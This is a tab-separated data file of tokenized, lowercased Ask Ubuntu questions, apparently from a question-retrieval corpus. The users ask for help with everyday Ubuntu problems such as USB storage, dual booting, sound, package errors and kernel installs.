314943	usb drives not recognized all of a sudden ( module usb_storage not loading )	i am very close to the solution , just need to know how to get usb-storage to load i have tried most of the advice on askubuntu and other sites , usb_storage enable to fdisk -l. but i am unable to find steps to get it working again . sudo lsusb results bus ... . skipped 4 lines bus 004 device 002 : id 413c:3012 dell computer corp. optical wheel mouse bus 005 device 002 : id 413c:2105 dell computer corp. model l100 keyboard bus 001 device 005 : id 8564:1000 sudo dmseg | tail reports [ 69.567948 ] usb 1-4 : usb disconnect , device number 4 [ 74.084041 ] usb 1-6 : new high-speed usb device number 5 using ehci_hcd [ 74.240484 ] initializing usb mass storage driver ... [ 74.256033 ] scsi5 : usb-storage 1-6:1.0 [ 74.256145 ] usbcore : registered new interface driver usb-storage [ 74.256147 ] usb mass storage support registered . [ 74.257290 ] usbcore : deregistering interface driver usb-storage fdisk -l reports device boot start end blocks id system /dev/sda1 * 2048 972656639 486327296 83 linux /dev/sda2 972658686 976771071 2056193 5 extended /dev/sda5 972658688 976771071 2056192 82 linux swap / solaris i think i need steps to install and get usb_storage module working . edit : i tried sudo modprobe -v usb-storage reports sudo modprobe -v usb-storage insmod /lib/modules/3.2.0-48-generic-pae/kernel/drivers/usb/storage/usb-storage.ko edit : jsiddharth @ siddharth-desktop : ~ $ sudo udevadm monitor -- udev monitor will print the received events for : udev - the event which udev sends out after rule processing udev [ 4757.144372 ] add /module/usb_storage ( module ) udev [ 4757.146558 ] remove /module/usb_storage ( module ) udev [ 4757.148707 ] add /devices/pci0000:00/0000:00:1d.7/usb1/1-6 ( usb ) udev [ 4757.149699 ] add /bus/usb/drivers/usb-storage ( drivers ) udev [ 4757.151214 ] remove /bus/usb/drivers/usb-storage ( drivers ) udev [ 4757.156873 ] add /devices/pci0000:00/0000:00:1d.7/usb1/1-6/1-6:1.0 ( usb ) udev [ 4757.160903 ] add /devices/pci0000:00/0000:00:1d.7/usb1/1-6/1-6:1.0/host9 ( scsi ) udev [ 4757.164672 ] add /devices/pci0000:00/0000:00:1d.7/usb1/1-6/1-6:1.0/host9/scsi_host/host9 ( scsi_host ) udev [ 4757.165163 ] remove /devices/pci0000:00/0000:00:1d.7/usb1/1-6/1-6:1.0/host9/scsi_host/host9 ( scsi_host ) udev [ 4757.165440 ] remove /devices/pci0000:00/0000:00:1d.7/usb1/1-6/1-6:1.0/host9 ( scsi ) narrowing down more : seems like i need usb_storage to load as a module jsiddharth @ siddharth-desktop : ~ $ lsmod | grep usb usbserial 37201 0 usbhid 41937 0 hid 77428 1 usbhid still no usb driver mounted . nor does a device show up in /dev . any step by step process to debug and fix this will be really helpful .
314944	can not authenticate to sbs 2003	i am trying to connect my machine to my work 's entirely windows network and i am having a few issues : whenever i try to access the server , the authentication dialog just keeps popping back up . i can not connect to the printers ( it says connecting to device failed ) i have tried setting up samba , winbind , kerberos , likewise open all to no avail . i have a feeling i am just setting them up wrong . my nautilus shows this when i go to network > windows network > mastermagnets i can ping both mastermagnets.local and 192.168.0.2 after modifying my /etc/hosts james @ jamesmaddison : ~ $ cat /etc/hosts 127.0.0.1 localhost jamesmaddison 192.168.0.2 mastermagnets.local 192.168.0.50 sharp-printer # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters i believe that 's the correct domain ( not sure if that 's the correct term ) as when i do nslookup mastermagnets.local i get the following : james @ jamesmaddison : ~ $ nslookup mastermagnets.local server : 192.168.0.2 address : 192.168.0.2 # 53 name : mastermagnets.local address : 192.168.0.3 name : mastermagnets.local address : 192.168.0.2 it all worked fine before i reinstalled ubuntu and now i just can not get access to the server . all help is appreciated , i need to get this working or i fear i will be forced to develop in a windows environment : (
314945	dual booting windows 8/ubuntu 12.04.2 , grub does n't appear and machine never boot in ubuntu	i got a new acer predator ag3620-ur308 which came with windows 8 , so i wanted to run ubuntu 12.04.2 on it as a dual booting . to be honest , i 've been doing dual booting for a while now so , i did the right thing . the box came with 2tb hdd . so i made 4 partitions with a raw partition just after the windows installation partition i always do manual installation so even if ubuntu did n't detect windows 8 , it was ok for me . so i created swap area and finished the installation etc ... .grub was install on the only drive there which is sda . after reboot , grub does n't even come up.so it always boot in windows 8 . i did repeat the installation process twice and yield same result . which is weird because this method always works for me so far.even the laptop am using to write this post is a dual booting windows 7/ mint nadia installed the same way . is there anything new in windows 8 that i did n't make provision for ? before starting the installation , all i read about was that , windows 8 should be installed first and ubuntu after . i went ahead and disable secure boot from the bios and enabled csm ( do n't even know what it means ) according to acer custhelp site . i boot from usb and did fdisk -l bellow is the result : ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x8c361cb5 device boot start end blocks id system /dev/sda1 1 3907029167 1953514583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 8178 mb , 8178892800 bytes 255 heads , 63 sectors/track , 994 cylinders , total 15974400 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006a87e device boot start end blocks id system /dev/sdb1 * 2048 15972351 7985152 b w95 fat32 ubuntu @ ubuntu : ~ $ can anybody shed some light ? thank you in advance edit hey , i just did another trial with 13.04 this time and still no luck . bios : secure-boot : disabled enable csm : always 1-delete previous ubuntu partition and swap area partition.now having free space 2- used usb installer to prepare usb with ubuntu-13.04-desktop-amd64.iso 3- rebooted : liveusb didnt detect windows 8 , used something else 4-created partition ext4 for / 5-created partition for swap-area 6- default grub path is /dev/sda and clicked install acer always boots into windows . new edit hello after following the boot-repair suggestion installed on the liveusb , i could now see grub but ca n't log into windows anymore as it 's not in the list . the boot-repair also completed with an error , i guess logged on pastin.ubuntu bellow is the screen shot of how my drive is organized
314946	why am i getting this error while installing gnome ?	i have raring ringtail . i installed gnome a couple days ago . i try to install extensions but the site says i do n't have the latest version . i type the command sudo apt-get install gnome-shell and i get this error reading package lists ... done building dependency tree reading state information ... done gnome-shell is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 138 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up initramfs-tools ( 0.103ubuntu0.7 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-25-generic cp : can not stat ‘/module-files.d/libpango1.0-0.modules’ : no such file or directory cp : can not stat ‘/modules/pango-basic-fc.so’ : no such file or directory e : /usr/share/initramfs-tools/hooks/plymouth failed with return 1. update-initramfs : failed for /boot/initrd.img-3.8.0-25-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) why ?
314947	how to partition a fully used hard drive	i installed ubuntu on my laptop which when i got it i had fedora 13 installed on it as the os . now i want to install fedora 18 in a dual boot with ubuntu . problem is when i installed ubuntu , i did n't partition for dual boot and i gave the entire hard drive to ubuntu and no longer have the space to dual boot . how can i lower the partition on ubuntu to make space on the hard drive for fedora ? i want to split the hard drive 50/50 between the two . thanks in advance .
314948	on terminal , to disable alt to show menu tabs	i prefer on terminal using alt-b to move to previous word/space ( i 'm not sure if this is normal behavior of terminal but at least on gnome i can do that ) . but on unity pressing alt only shows the menu tabs that are hidden normally . how can i disable that ? i 'm on quantal .
314951	is there a way to make ubuntu adjust the screen brightness automatically ?	does anybody know where i can find a program ( or system setting ) which turns up the brightness automatically when my laptop is plugged in to ac and turn down the brightness when disconnected from ac ? i 'm running ubuntu 12.04.2 lts 64-bit
314954	no sound in ubuntu 13.04 after logging in	good day ! i 'm having a problem with no sound ( at all ) in ubuntu 13.04 after log in ( because when i 'm logging in there is sound from os ) . i 've checked the pulseaudio for automute and do the os recognising my audio card in system settings ( no problems have been detected ) . my speakers and headphones are ok. all these things have happened to me after latest software update .
314955	sort lines in text file with specific separator in linux	i need to sort the lines of a text file ( without any extension ) where the lines are separated by % . when using sort command , those % s are also getting sorted out which i do not want . how to sort the text file from command line or by any other method and save with same name ? for example : filename : myfile before sorting > > a line one % c line two % b line three % after sorting > > % % % a line one b line three c line two desired > > a line one % b line three % c line two %
314964	multiple mounts on single partition , fresh install	lead in : this may be a little advanced to correctly answer simply , however i am a technical user and will be able to follow a complex solution . situation : i have a 120gb ssd and 1tb hdd in my computer . i am a user that for my situation will be formatting often as well as attempting to preserve my ssd from both large format 's and uneeded in-system writes . after creating a successful filesystem structure from installation ( and if need be post install configurations ) that meets my needs , i will then be saving a copy of the two drives 's via imaging in the event i need to restore `` factory '' settings without the lengthy process of re-installation . -both drives are empty so no care has to be taken in data preservation . -i will be doing installation and if need be post configuration from within a live usb ubuntu environment . -i will be imaging both drives pre-boot to save to a seperate 16gb flash drive . goal : i simply require 5 partitions total between the 2 drives . ssd [ partition 1 ] [ 512 mb ] [ efi filesystem ] [ /boot ] - grub [ partition 2 ] [ fill ] [ ext4 ] [ / ] - os and dependencies hdd [ partition 1 ] [ 512 gb ] [ ext4 ] [ /home ] [ partition 2 ] [ 128 gb ] [ ext4 ] [ /usr - /opt - /var ] [ partition 3 ] [ 16 gb ] [ linux-swap ] [ unallocated ] [ fill ] ( possibly / undecided ) 16gb ram [ partition 1 ] [ 4gb ] [ tmpfs ] [ /tmp ] [ unallocated ] [ fill ] problem : in hdd - partition 2 i require multiple mounts to be used in a single partition on the hdd with absolutely no direct uneeded write access on part of the hdd to ssd . the installer will only work with seperate filesystems with seperate partitions . i am attempting to both reduce space used and writes to the ssd while attempting to use the hdd for the more space and write intensive directories without the need for creating partitions costing performance . outcome : what i expect from a solution is the steps to finalizing allocation of the root / file structure on a single partition on the ssd while placing /usr - /opt - /var - ( for now ) /tmp on the hdd in a single partition . thank you in advance .
314965	keefox and keepass are installed . yet every time i open firefox , i 'm asked to configure it again	i have installed keepass2 from the ubuntu software center and keefox in firefox . the setup works fine . both can communicate with each other . however , every time i start firefox i 'm greeted with the same window asking me to configure it all over again even though there is no need . how can i fix it ? there is no obvious setting in the extension or about : config to change this behaviour .
314968	create ad-hoc network on lubuntu ( pcduino )	i bought a pcduino that has lubuntu os installed on it . i want to build a web server to host a simple web page on that pcduino . but i want to access this web page directly using ad-hoc network ( without the need of router ) i was trying to make an ad-hoc network on lubuntu using a normal wifi dongle . but that 's not working for me ! do i need a different wifi dongle that support master mode ? reason why im doing this : i want people who 's gon na use my pcduino to access it via any browser in the local network or via their phones to enter their router credential in order to connect automatically to the internet every time they turn the pcduino on . is there any other solution for my problem ? !
314978	can we install ubuntu 12.04 from downloaded iso file using wubi installer ?	when i try to install ubuntu 12.04.2 64 bit using wubi installer . it starts to download the file instead of using already downloaded iso file `` ubuntu-12.04.2-desktop-amd64 '' . how to fix it ?
314980	how to fix flashing stock login background ?	after the first time i changed the desktop background ( includes login screen ) , i noticed at startup when the desktop background is supposed to pop up , the stock background ( purple and orange ) flashes one time before the current background appears . could this perhaps have something to do with the graphics driver ? this isnt much of a problem , but it just looks a little weird . is there a way to fix this ?
314983	when i run a bash file manually , it works , but crontab can not run it ?	this is my sh-file : http : //paste.ubuntu.com/5816543/ , that i use this to download youtube files in a specific period per day . when i drag the file ( y.sh ) into the terminal and press return key , it starts to download . but when i use the below command in crontab -e , nothing happens ! 00 21 * * * /home/deroot/links4dl/y.sh torify : wrapper for torsocks or tsocks and tor - > man torify youtube-dl : download videos from youtube.com or other video platforms - > man youtube-dl
314985	ugly font rendering without smoothing	after disabling font smoothing , bold versions of fonts render very strange . example below ( notice `` keyboard_shortcuts '' ) . regular version of font is ok and behavior is problematic for many fonts ( lucida is just an example ) . also , problem is n't specific for `` open file '' dialog .
314986	how to do a clean install of ubuntu on a gpt disk while keeping the partition table ?	is there anyway to do it ? i tried first using gdisk on my old partition table ( mbr ) then using livecd to do a clean ( and encrypted ) installation . after that i ended up with a mbr again . i do n't mind having to wipe out my disk ( again ) .
314987	ubuntu sdk and qtcreator will not start	i have tried sudo apt-get purge ubuntu-sdk qtcreator qtcreator-plugin-ubuntu qtcreator-plugin-cordovaqt and then sudo apt-get install ubuntu-sdk but qtcreator will still not start . it does not show up and after a few tries at starting it the apport gui shows up . i get this error when i run qtcreator in the terminal : can not mix incompatible qt library ( version 0x50001 ) with this library ( version 0x50002 ) aborted ( core dumped )
314990	how to move to kde ?	i use ubuntu 12.04 with gnome as default desktop environment . how to remove gnome and install kde as desktop environment ?
314994	cd/dvd permissions	okay , i was burning some videos onto a dvd , and after i finished , took the cd out . now , trying to use the same cd to burn something of the same series , so i wanted to keep it on one cd , i ca n't seem to copy and paste , delete , or format the cd , and the permissions have been set so that i can only `` acces files '' or something along those line . so im only allowed to view , or play . this happens with every cd i put in . i can put it in once , and change something , but the next time i try to , the permissions have been set to only allow to to `` access files '' and i ca n't change it as an admin user , or as `` su '' through the terminal ( though i was trying to use the `` gksu nautilus '' program ) so , sorry if thats too long , but does anyone know why this keeps happening ? ? ? and if so , how to resolve this ?
314997	ubuntu shut down while updating ?	last night i was updating my ubuntu 10.04 to either 11.04 or 12.04 ( i 'm not entirely sure which one it was , but i think it was 11.04 ) and i left it overnight to finish . when i came down in the morning , i noticed that the computer had n't barely begun installing the updates ! the update thing said that my computer was on the installation step , but it was still preparing the libc bin ( or whatever its called ) . it 's like the first part of the step installing the upgrades . so , i stupidly restarted the computer , and when it rebooted , i got five options on a purple screen : ubuntu , with linux 3.0.0-28-generic ubuntu , with linux 3.0.0-28-generic ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) long story short , not matter which way i enter ubuntu to try and reinstall the updates using the root thing ( it 's like terminal ) after i enter sudo apt-get update it basically said it failed to fetch every url link , and it then says : w : some index files have failed to download . they have been ignored , or old ones used instead . w : not using locking for read only lock file /var/lib/dpkg/lock e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so , i entered sudo dpkg -- configure -a , and it says : dpkg : error : unable to access dpkg status area : read-only file system '' i 'm left like wtf , and i really just some guidance here . i just got this laptop , and i can not afford a new one if i broke this one .
315000	trouble working on wordpress development locally due to file permissions	i am a newbie wordpress developer switched to ubuntu 12.04 from win 7 . i find these root file permissions really difficult to deal with . i installed geany but ca n't open root files with it . how do you work on lamp with such kind of permissions . please share few tips , it is very frustrating and time consuming .
315004	how to install libertas firmware	i have a case where trying to install the libertas-firmware package results in : the following packages have unmet dependencies : libertas-firmware : depends : firmware-libertas but it is not installable e : unable to correct problems , you have held broken packages . of course , i actually do not have any held or broken packages and the dependency package firmware-libertas does not exist on the repositories which makes me think that the libertas-firmware is actually a dummy meta package for the firmware-libertas package . but how can i install the libertas drivers then if the dependent package is not available .
315012	gparted for one partition	http : //imgur.com/9prkseb i have one partition as in picture above . i want to create 50gb of partition to install windows . how can i do that ? thanks !
315013	wireless driver not loading after changing ownership of /usr/lib . how can i restore default ownership ?	i have changed the ownership of /usr/lib by mistake as root : root by running the below command : sudo chown -r root : root /usr/lib/ now , the wireless drivers are not loading and also i am not able to shutdown or restart the system without using the terminal . i changed back some of the folders ' ownership to the username and temporarily solved few problems . do i need to format my system ? if anyone has a better solution , please help !
315015	how can i remove python 2.7 after installing python 3.3 ?	i have successfully installed python 3.3 on ubuntu 12.10 . since i donât need multiple versions of python , i want to remove the existing python 2.7 . when i try to do that , using sudo apt-get remove python2.7 ubuntu warns me that there are tons of system dependent components which will also be removed . it looks really scary . so , is there a way to remove python 2.7 without removing the system dependent components , or can i direct those dependents to use python 3.3 ?
315016	bridging eth0 and vboxnet0 and using isc dhcp server to provide dynamic ips	i have lubuntu 12.04 ( 64bit ) with virtualbox 4.2 installed and the setup below : eth0 adapter connected to lan ( having static ip 192.168.0.1 and it is the default gateway ) . isc dhcp server listening on eth0 , to configure pcs ( in lan ) with dynamic ips . ppp0 adapter ( wirless mblaze usb modem ) to connect to internet . eth0 has nated to ppp0 , so that all pcs connected to the lan can have internet . vboxnet0 host only network ( selected for the virtual machines ) . i would like to have a bridge combining vboxnet0 and eth0 to make it a single network ( say br0 ) and have the dhcp server serve ips through this new bridge . br0 now should take the static ip of eth0 , so that the bridge can be the new gateway . please note i neither need bridged adapter nor nat solution in virtualbox setting ui . i would like to configure all these manually editing all the associated configuration files . any help deeply appreciated . thanks in advance .
315024	can not download ubuntu iso file because the are recognised as virus	can not download ubuntu iso files , because the are shown as some kind of virus . please help me .
315026	how to install program from live-cd chroot ?	i am using lubuntu 13.04 . how can i install programs from a live cd from chroot ?
315027	why do n't custom upstart job names tab complete in the service command ?	i 'm used to create upstart services with a file in /etc/init/ < service > .conf and it works perfectly fine , the only thing i 'd like to is to have tab completion the same way that every service in /etc/init.d/ have right now . when writing sudo service xx the name of the service should apear . is there a way to add upstart services to that autocompletion list ?
315028	migrating an ubuntu mirror made with `apt-mirror`	we have one office with broadband and another one with dialup . my goal is to create a local ubuntu mirror on the second office . i have used apt-mirror on my local machine , and it downloaded about 130gb of packages . how do i transfer these files to another computer to create a local mirror ? do i just copy the folders with the .deb files to the new machine ? do i need to edit config files or perform another action ?
315034	start dropbox on startup	i installed dropbox ( 2.0.26 ) via the command line instructions here ( https : //www.dropbox.com/install2 ) . dropbox is running great except that it wo n't start on startup . the command given ( ~/.dropbox-dist/dropboxd ) runs fine via the terminal or alt+f2 , but it is n't working in startup programs . i 'm probably missing something obvious regarding the syntax for a startup program command . any suggestions ?
315035	ubuntu on a usb	i was just wondering if anyone had a good experience with ubuntu on a flash drive ... i 'm installing it right now . i formatted my 16gb flash drive to ext2 because the default file system is ext4 but that one is journaled and usb flash drives do not like journaling . i want to use this to learn java and ubuntu seems to be a great os for this . i ( obviously ) have usb 2.0 ports where i will put the usb in . how is the boot time of ubuntu on a usb ?
315037	new installation with invalid signatures : nodata 1 nodata 2 error	i am installing 13.04 into a virtualbox machine . after installing , i receive this error after sudo apt-get update : ign http : //archive.ubuntu.com raring release e : erro gpg : http : //archive.ubuntu.com raring release : the following signatures were invalid : nodata 1 nodata 2 i have already tried : install minimal server version ; install 12.04 desktop version ; everything gives me the same error .
315038	how to automatically slow cpu instead of starting fans ?	in windows ' power options , you had the ability to configure your system to use either 'active ' or 'passive ' cooling schemes . in the 'active ' scheme , the fans would start running faster as the cpu got hotter - then slow the cpu if the fans were at maximum . in the 'passive ' scheme , the cpu would slow down before running the fans faster . is there a way to configure linux to switch between these 'schemes ' somehow , either set up manually with a configuration file or similar ? as a note , pwmconfig states : there are no pwm-capable sensor modules installed and fancontrol states : ca n't read configuration file . i 'd like to be able to switch to a passive power scheme at times for times when i need my laptop to remain quiet , but not necessarily fast , e.g . in a library .
315044	selected audio ports in pavucontrol not being used for audio	i am trying to use pavucontrol to control my audio ports on my samsung series 9 laptop . i am using ubuntu 13.04 . i am using pavucontrol because in 13.04 , the standard sound options config page only offers me the `` analogue stereo output '' profile , while pavucontrol offers all the options that previous versions of ubuntu were offering . i have a single combined headphone/mic audio jack . if i plug something into this jack , pavucontrol automatically switches the output port to headphones - this makes sense , but if i manually switch the port back to speakers while the headphones are plugged in , the audio continues to play through the headphones . no matter which input port i select ( `` internal microphone '' or `` microphone '' ) , it only takes the audio from the internal microphone . happy to provide any logs or output if this helps .
315056	download manager for ubuntu 12.04 and google chrome	i am looking for a download manager which can take over downloads in google chrome . i mean it must be integrate with google chrome . i could not find a download assistant on chrome web store . so i do n't know how to integrate down managers in google chrome .
315058	hybrid usb install method - netboot and iso	i was following the steps here ( `` preparing files for usb memory stick booting '' ) https : //help.ubuntu.com/10.04/installation-guide/i386/boot-usb-files.html to create a installation usb drive for 12.1 . the very first paragraph of the article states '' the second is to also copy a cd image onto the usb stick and use that as a source for packages , possibly in combination with a mirror . '' however , the only instructions mentioned regarding an iso image is to simply copy one somewhere on the drive ( after its been made bootable and syslinux , vmlinuz and initrd.gz installed/copied ) : '' you should now copy an ubuntu iso image onto the stick . '' i thought it strange there where no configuration steps for `` pointing '' the kernel to the iso ( like a line in syslinux.cfg or a boot : option or something ) , but went ahead with the install anyway . i do n't think the iso was used at all , it appeared that all the os files where downloaded during the install process . therefore , i was wondering if anyone knew how to use this local iso image in this particular installation technique ( i know the image can be installed with dd , but thats a different technique ) , b/c i need to reinstall ( i installed unity , but it 's wayy to much for my little atom based netbook ) ? thank you .
315067	ca n't add more than eight keyboard layouts	i read this article where is a workaround to add maximum eight keyboard layouts . but my questions are : i would like to try this , but i see they 've written there something with `` gnome '' in the script . in my ubuntu , 13.04 , i have unity . what do i do ? i would have to do this for four x four keyboard layouts ( to have 13 keyboard layouts ) . this script , however , is designed for two x four keyboard layouts . how do i get the four x four ? i would really appreciate your tips and hints on this . and i would kindly ask you to keep it simple , if possible , because i 'm really no expert in both ubuntu and computers in general .
315068	how to un-install a special driver/kernel in 13.04	i have tried to install a special ati driver using a method described in http : //debianhelp.wordpress.com/2012/09/28/to-do-list-after-installing-ubuntu-13-04-aka-raring-ringtail-operating-system/ details : alternative ati legacy video driver ppa installation for ( for < 5000 series cards ) : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* sudo add-apt-repository ppa : makson96/fglrx sudo apt-get update sudo apt-get upgrade sudo apt-get install linux-headers-generic fglrx-legacy sudo aticonfig -- initial and then reboot . there were a couple of warnings at `` sudo apt-get install linux-headers-generic fglrx-legacy '' with update-alternatives . but , at the last step i got `` aticonfig : no supported adapters detected '' . unity does not start anymore . i only can login to gnome . how can i get back to a working system ?
315071	configuring partitions during install	i 'd like to install ubuntu on my computer . i have a 500gb hdd with the following partitions : ( at least what the ubuntu installer shows ) : / - windows 7 ( loader ) - 100gb - 400gb i 'd like to install ubuntu to the 100gb partition as on the 400gb i have windows . but i have problems with the following : whether i can set a swap particion without messing up my windows . which file system to set to the partition . please tell me what and how to do it in the installer .
315072	can not do apt-get update on 12.04 , can not connect to ip	i can not update my ubuntu from terminal or software center and the links work if i go to them manually . heres the terminal feed.i have to remove the links but they work . err security.ubuntu.com precise-security/main amd64 packages unable to connect to 172.25.10.3:80 : ... ... ... ... ... . ... ... .. ... ... . w : failed to fetch archive.linux.duke.edu/ubuntu/dists/precise/universe/binary-amd64/packages unable to connect to 172.25.10.3:80 :
315075	unable to install any linux based os in my hp pavilion dv6 notebook	processor : intel core i7 ram:8gb hd:1tb i have windows 7 in my system . i tried to install ubuntu 11.04 and 12.04 both with wubi and with dvd.with wubi even when the installation is successfull the os wont boot after some time.and with dvd it shows error `` 0x0009 '' and the intallation stops . the same is the case with any linux based os i try to install.with fedora the installation stops after the display , '' detecting hard drive ... '' .are there any settings that must be changed in my system . the hard disk contains 4 partitions : c : , system , hp tools and recovery . but c makes up almost 910 gb update i deleted one partition and tried with both dvd and wubi..the process ends after displaying a message , '' unexpected exit 0x0000 '' if i try to boot from dvd the process stops and the system hangs before completion of the booting process please instruct me how to overcome this obstacle.i am stuck.. !
315076	does ubuntu phone support the nokia n9 ?	would be possible to use ubuntu phone with nokia n9 ? meego os did n't meet any expectation . i 'd love to keep my phone but replace meego with ubuntu .
315078	how to manage permissions on a shared volume for osx and ubuntu	on my mac i 'm using an unjournaled hfs partition to share files between osx 10.8 and ubuntu 12.04 . it was a nice thought at first , because time machine will automatically backup the volume in osx , but i soon noticed that osx and ubuntu mess with the permission in a way that makes things messy for me . so , in order to fully view and change files , i keep using chmod to apply permissions that will allow me to fully use a document . but i do n't understand why i have to keep applying changes over and over . is possible to set some kind of permission permanently so that both operating systems will respect permanently ? i guess 777 will work , but i thought that this is not a smart thing to do . but as long as 'others ' does not get full access ( third seven ) , i see a lock icon on the file in ubuntu .
315083	after suspend , my monitor wont turn back on	i set my pc to suspend after 5 minutes of inactivity , when i return to my computer i mash a couple of keys and the pc turns back on and the drives start spinning etc etc , but i get no signal to either of my monitors . my peripherals are powered as the num/caps lock lights turn on and off . i should add i have two monitors , i have the same problem on both . as i am writing the last line from my previous paragraph keeps disappearing . i press control z and it comes back but kinda weird . thanks in advance for any help : )
315084	permission denied on installer	when i try to install ubuntu with wubi , it gets to about 70 % but then it stops for a couple minutes . then , it says permission denied . i already tried using a virtual drive but it does n't work .
315089	problems with software installation after kernel update	i am using ubuntu 13.04 64 bit . i decided to install linux kernel 3.10 which was released recently so , i downloaded the kernel and header packages from kernel.ubuntu.com since it 's not in raring repos . i was able to install headers without problems but when i tried to install the kernel , i got this error root @ pulkit-vostro-1014 : /home/pulkit/downloads # dpkg -i kernel.deb ( reading database ... 222087 files and directories currently installed . ) preparing to replace linux-image-3.10.0-031000-generic 3.10.0-031000.201306301935 ( using kernel.deb ) ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error processing kernel.deb ( -- install ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.10.0-031000-generic /boot/vmlinuz-3.10.0-031000-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.10.0-031000-generic /boot/vmlinuz-3.10.0-031000-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.9.7-030907-generic ... p : writing config for /boot/vmlinuz-3.8.0-25-generic ... p : writing config for /boot/vmlinuz-3.10.0-031000-generic ... p : writing config for windows 7 ( loader ) on /dev/sda1 ... p : installing debian theme ... cp : can not stat â/usr/share/syslinux/themes/debian- wheezy/extlinux/memtest.binâ : no such file or directory run-parts : /etc/kernel/postrm.d/zz-extlinux exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/tmp.ci/postrm line 328. dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : kernel.deb also , whenever i try to install/remove any software i get this root @ pulkit-vostro-1014 : /home/pulkit/downloads # sudo apt-get install vlc reading package lists ... done building dependency tree reading state information ... done e : the package linux-image-3.10.0-031000-generic needs to be reinstalled , but i ca n't find an archive for it . please help me out ! ! !
315090	how do i uninstall 13.04	the install procedure worked until reboot . i installed 13.04 alongside windows xp . but booting from the grub menu results in a blank screen . xp professional is on one disk , and 13.04 on another disk . since 13.04 is useless to me , i want to remove it . how do i uninstall it ?
315094	ca n't mount 64 gb sdxc	i did a clean install of 13.04 and now i 'm having a hard time mounting my sd card . i had it working on my old system , which was also 13.04 but i had upgraded from 12.04 . i ca n't figure out how to get it working now . i tried this on my laptop and this is the result . any ideas how i can fix this ? jay @ jay-k55vd : ~ $ sudo apt-get install fuse-exfat exfat-utils reading package lists ... done building dependency tree reading state information ... done exfat-utils is already the newest version . the following new packages will be installed : fuse-exfat 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/26.4 kb of archives . after this operation , 98.3 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 189001 files and directories currently installed . ) unpacking fuse-exfat ( from ... /fuse-exfat_1.0.1-1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/fuse-exfat_1.0.1-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man8/mount.exfat-fuse.8.gz ' , which is also in package exfat-fuse 1.0.1-1 processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/fuse-exfat_1.0.1-1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
315095	ubuntu touch install problem	i have installed the ubuntu touch developer preview on my nexus 4 . it is the problem when i want to get back to my android 4.2.2 but i wipe all my data first , from factory reset , cache partition and also the dalvik cache . now , i can not root my phone to android neither ubuntu because the pc can not recognize my phone . can you tell me what is my problem and how can i fix this ? thanks !
315109	ubuntu 13,04 amd processor overheating	hi i have an asus eee pc seashell series 1215b with an amd e-350 processor ( 2cpus ) -1.6ghz , and after installing ubuntu 13.04 it keeps getting hot to the point that the laptop turns off alone . i do not have this problem with windows , and when i had ubuntu 12.04 lts my computer would get up to 91째c , so why is my pc getting so hot with ubuntu ? ? i do not own an external cooling fan because i thought it would not be necessary but it seems that it is a must if i want to use ubuntu ... what can i do ? ? p.s . i am not the only person i know to have this issue , many of my friends went back to windows because of this : s
315110	usable ram is half of total memory	recently i had added a 2gb ddr3 ram in my acer laptop . as a result my total ram is 4gb ( 2x2 ) . i was running ubuntu 12.04 32bit ( pae kernel ) . everything was working fine . now i have upgraded ( new install ) to 13.04 64bit . suddenly i noticed that system is showing only 1.7gb . so i run lshw to ensure the fact . but lshw shows correct result ( 4gb = 2x2 ) . how could i solve this ? ? ? there is no settings in bios for ram at all . my system is newly installed . no additional applications is installed except amd-catalyst driver . system : acer aspire 4250 e-450 apu note : biso also showing that 4gb ram installed .
315113	how to run deluge from cli ?	i want to run deluge in tty3,4,5 . but when i type it there is , no display warning . then i give top and there is no pid on deluge that is deluge is not running . how do i run it from cli so that it keeps downloading the torrents ?
